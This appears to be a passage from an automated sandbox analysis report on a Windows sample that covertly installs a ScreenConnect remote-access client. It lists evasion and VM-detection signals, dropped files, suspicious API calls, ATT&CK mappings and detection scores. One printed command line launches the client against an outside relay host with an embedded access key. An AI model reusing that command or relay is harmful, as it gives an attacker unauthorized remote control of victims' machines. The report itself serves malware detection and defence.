Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\H36NgltNe7.exe	Memory allocated: FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Memory allocated: 2980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Memory allocated: 4980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Memory allocated: 6140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Memory allocated: 58F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Memory allocated: 7140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Memory allocated: 8140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Memory allocated: 6140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Memory allocated: 6140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Memory allocated: 83D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Memory allocated: 14E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Memory allocated: 1720000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Memory allocated: 1560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Memory allocated: C70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Memory allocated: 1AC40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Memory allocated: F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Memory allocated: 1AD50000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\H36NgltNe7.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI576D.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.Compression.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\ScreenConnect.InstallerActions.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.Compression.Cab.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI5529.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.WindowsInstaller.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\ScreenConnect.Core.dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\H36NgltNe7.exe TID: 2700	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe TID: 3240	Thread sleep count: 53 > 30	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe TID: 5916	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor

Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\H36NgltNe7.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: ScreenConnect.ClientService.exe, 00000008.00000002.2758072444.0000000004D00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
Source: H36NgltNe7.exe, 00000000.00000002.1485228493.0000000000DED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}U

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Anti Debugging

Enables debug privileges

Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\H36NgltNe7.exe

Memory allocated: page read and write | page guard

.NET source code references suspicious native API functions

HIPS / PFW / Operating System Protection Evasion

Source: 0.2.H36NgltNe7.exe.50e0000.3.raw.unpack, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT \| WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
Source: 0.2.H36NgltNe7.exe.50e0000.3.raw.unpack, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
Source: 0.2.H36NgltNe7.exe.50e0000.3.raw.unpack, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
Source: 0.2.H36NgltNe7.exe.50e0000.3.raw.unpack, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
Source: 0.2.H36NgltNe7.exe.50e0000.3.raw.unpack, WindowsExtensions.cs	Reference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
Source: 0.2.H36NgltNe7.exe.2860000.0.raw.unpack, Program.cs	Reference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\H36NgltNe7.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown

Process created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (20ae101cef0f1acf)\screenconnect.clientservice.exe" "?e=access&y=guest&h=lokistorage.xyz&p=8041&s=3a500b51-1436-4bf3-8200-68822bcae42d&k=bgiaaackaabsu0exaagaaaeaaqchadx0vdcoypzw3rhl2%2fwsmdfp2rmcowlbz1ecggd2oi1gruiacwzcrkszxbywgdfgxdbyoegqdwtpmoqlg8jof4zkxvyt9zhvvqib5ire7%2frfo81g3%2b6hxkpjc0inqs%2bxruwq1z%2b6smxqscbb%2fykhdhw7ahbhyk65snb5ak02%2bpswsu904ncqii1vfx60s4cj8ilr9kifjwymgg0rdnakscv6gau5odsv8wz3cfurc2fznj8a0fkfb5xyik39fbiivzp4vyfarunnluqwccrm3hrkoohc9g96dlui6y4avh5vyzfnxeaixqvrlqzjtpadrhivwzf5sgoywqiok%2bc5&t=patrycja%20bochenek&c=pl&c=dariusz&c=&c=&c=&c=&c=&c="

Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1546068019.0000000000792000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr	Binary or memory string: Progman
Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1546068019.0000000000792000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr	Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass

Language, Device and Operating System Detection

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\H36NgltNe7.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe

Code function: 8_2_052C1660 CreateNamedPipeW,

8_2_052C1660

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe

Code function: 8_2_014E4C61 RtlGetVersion,

8_2_014E4C61

Source: C:\Users\user\Desktop\H36NgltNe7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Modifies security policies related information

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\msiexec.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages

Yara detected ScreenConnect Tool

Remote Access Functionality

Source: Yara match	File source: H36NgltNe7.exe, type: SAMPLE
Source: Yara match	File source: 9.0.ScreenConnect.WindowsClient.exe.790000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.H36NgltNe7.exe.52e0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.ScreenConnect.WindowsClient.exe.2cbfa10.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.ScreenConnect.WindowsClient.exe.2dcfa50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.H36NgltNe7.exe.52e0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.H36NgltNe7.exe.6763d4.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.H36NgltNe7.exe.6fb9d4.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.H36NgltNe7.exe.72518c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.H36NgltNe7.exe.660000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1493878183.00000000052E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2730222529.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.1546068019.0000000000792000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1598063638.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1464550811.0000000000676000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1486363645.0000000002981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: H36NgltNe7.exe PID: 6560, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 5040, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 5796, type: MEMORYSTR
Source: Yara match	File source: C:\Config.Msi\6f527a.rbs, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Installer\MSI5509.tmp, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	31 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	OS Credential Dumping	11 Peripheral Device Discovery	Remote Services	11 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	1 Replication Through Removable Media	1 Native API	1 DLL Search Order Hijacking	1 DLL Search Order Hijacking	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	1 Component Object Model Hijacking	1 Component Object Model Hijacking	1 Obfuscated Files or Information	Security Account Manager	45 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Valid Accounts	1 Valid Accounts	1 Software Packing	NTDS	21 Security Software Discovery	Distributed Component Object Model	Input Capture	1 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	2 Windows Service	1 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	1 Bootkit	2 Windows Service	1 DLL Search Order Hijacking	Cached Domain Credentials	51 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	13 Process Injection	1 File Deletion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	122 Masquerading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Valid Accounts	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	51 Virtualization/Sandbox Evasion	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	13 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Hidden Users	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service
Business Relationships	Server	Trusted Relationship	Visual Basic	Container Orchestration Job	Container Orchestration Job	1 Bootkit	Web Portal Capture	Local Groups	Component Object Model and Distributed COM	Local Email Collection	Internal Proxy	Commonly Used Port	Direct Network Flood
Identify Business Tempo	Botnet	Hardware Additions	Python	Hypervisor	Process Injection	1 Rundll32	Credential API Hooking	Domain Groups	Exploitation of Remote Services	Remote Email Collection	External Proxy	Transfer Data to Cloud Account	Reflection Amplification

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
H36NgltNe7.exe	21%	ReversingLabs	Win32.PUA.ConnectWise

Dropped Files

Source	Detection	Scanner
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll	0%	ReversingLabs
